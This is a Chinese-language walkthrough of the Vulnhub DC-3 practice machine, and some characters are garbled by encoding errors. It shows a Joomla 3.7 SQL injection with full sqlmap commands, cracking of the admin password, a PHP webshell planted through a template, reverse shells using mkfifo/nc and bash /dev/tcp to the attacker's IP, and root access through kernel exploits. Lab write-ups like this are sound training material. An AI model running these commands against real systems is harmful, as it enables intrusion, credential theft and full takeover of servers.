基本信息

Kali:192.168.61.145?

DC3:192.168.61.163

實(shí)驗(yàn)過(guò)程

? ? ? ?同樣先通過(guò)arpscan掃描找出DC3的IP地址

?

sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

?

?

這里可以直接看出DC3的IP地址為192.168.61.163

然后我們使用nmap對(duì)目標(biāo)進(jìn)行掃描

發(fā)現(xiàn)目標(biāo)主機(jī)只是打開(kāi)了80端口

?

然后我們查看下80端口，通過(guò)wappalyzer，發(fā)現(xiàn)用的是Joomla

同時(shí)主頁(yè)也給我們提示，表明這個(gè)靶機(jī)只有一個(gè)flag

這里我們使用joomscan專(zhuān)用掃描器，來(lái)獲取網(wǎng)頁(yè)更詳細(xì)的信息

joomscan：https://github.com/OWASP/joomscan

perl joomscan.pl ‐u http://192.168.61.163

可以看到j(luò)oomla的詳細(xì)版本號(hào)和管理后臺(tái)

?

我們通過(guò)searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

可以看到有一個(gè)SQL注入漏洞

searchsploit ‐x php/webapps/42033.txt

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

接下來(lái)就是導(dǎo)出admin的賬號(hào)密碼，就只放個(gè)最后的結(jié)果圖，攻擊過(guò)程的語(yǔ)句如下:

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tablessqlmap -u "http://192.168.61.163/index.php? option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐ level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columnssqlmap ‐u "http://192.168.61.163/index.php? option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐ level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

我們將password的HASH值用john進(jìn)行破解

解密后的結(jié)果為：snoopy

我們嘗試進(jìn)行登陸，發(fā)現(xiàn)是正確的賬號(hào)密碼

?

賬號(hào)：admin密碼：snoopy

進(jìn)入后臺(tái)后，就要想辦法上傳一句話木馬。百度到可以編輯模板來(lái)上傳一個(gè)webshell

這里編輯Beez3模板

這里我在html目錄下創(chuàng)建了一個(gè)名為dfz.php的webshell

然后我們?cè)L問(wèn)下這個(gè)webshell，沒(méi)有出現(xiàn)404說(shuō)明成功上傳

?

http://192.168.61.163/templates/beez3/html/dfz.php

?

接下來(lái)用蟻劍來(lái)鏈接

我們?cè)贙ali上使用nc，通過(guò)蟻劍反彈一個(gè)shell

我們現(xiàn)在Kali上建立監(jiān)聽(tīng)

發(fā)現(xiàn)DC3上有python環(huán)境，嘗試使用python來(lái)彈shell，但是Kali上沒(méi)有任何反應(yīng)

然后嘗試使用bash來(lái)彈shell，但是也是不行

嘗試使用nc反彈成功

?

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f

然后使用python改善shell環(huán)境

python ‐c "import pty;pty.spawn('/bin/bash')"

?

獲取下Linux版本，可以看到是Ubuntu 16.04

我們查找下有沒(méi)有可以利用的提權(quán)EXP，通過(guò)searchsploit有好幾個(gè)

這里我們使用下面的EXP嘗試提權(quán)

???????

Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation | linux/local/39772.txt

我們打開(kāi)這個(gè)EXP的介紹，并到指定網(wǎng)站下載

?

https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐sploits/39772.zip

通過(guò)蟻劍上傳到靶機(jī)

然后接下來(lái)的話就是解壓、編譯、執(zhí)行EXP來(lái)獲得root權(quán)限，所有命令如下

unzip 39772.zipcd 39772tar ‐xvf exploit.tar

?

• ?

./compile.sh

• ?

./doubleput

獲得flag

?

額外補(bǔ)充

---

利用php反彈shell

?

system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");

• ?

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222>/tmp/f');

?

?

---

?

使用Linux-Exploit-suggestion來(lái)輔助提權(quán)

下載地址：https://github.com/mzet-/linux-exploit-suggester

上傳到/tmp中，并加權(quán)執(zhí)行

?

chmod +x linux‐exploit‐suggester.sh

?

?

這里嘗試下CVE-2016-5195

EXP地址：https://github.com/gbonacini/CVE-2016-5195

下載完成后通過(guò)蟻劍上傳，并解壓

然后進(jìn)入目錄后make下就可以得到dcow文件，執(zhí)行./dcow -s 嘗試提權(quán)

然后靶機(jī)就死機(jī)了，說(shuō)明這個(gè)EXP不適合

總結(jié)

以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC3的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。